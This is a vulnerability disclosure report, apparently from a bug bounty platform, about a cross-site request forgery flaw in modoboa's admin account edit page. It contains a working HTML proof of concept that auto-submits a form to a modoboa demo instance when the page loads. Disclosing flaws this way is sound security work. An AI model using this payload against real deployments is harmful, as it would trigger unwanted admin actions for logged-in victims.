CSRF leading to edit admin accounts in modoboa/modoboa
Valid
Reported on
Feb 26th 2023
Description
GET /admin/accounts/{id}/edit/?active_tab=default page is vulnerable to a CSRF attack.
Proof of Concept
Login as admin. try to edit admin accounts (example id=4) Open the following file in the browser.
<!DOCTYPE html> <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://demo.modoboa.org/admin/accounts/4/edit/"> <input type="hidden" name="active_tab" value="default" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html>
Impact
Attacker would be forced to edit& update admin accounts
We are processing your report and will contact the
modoboa
team within 24 hours.
2 months ago
The researcher's credibility has increased: +7
The maintainer has the power to assign a CVE during the fix and publish stages.
to join this conversation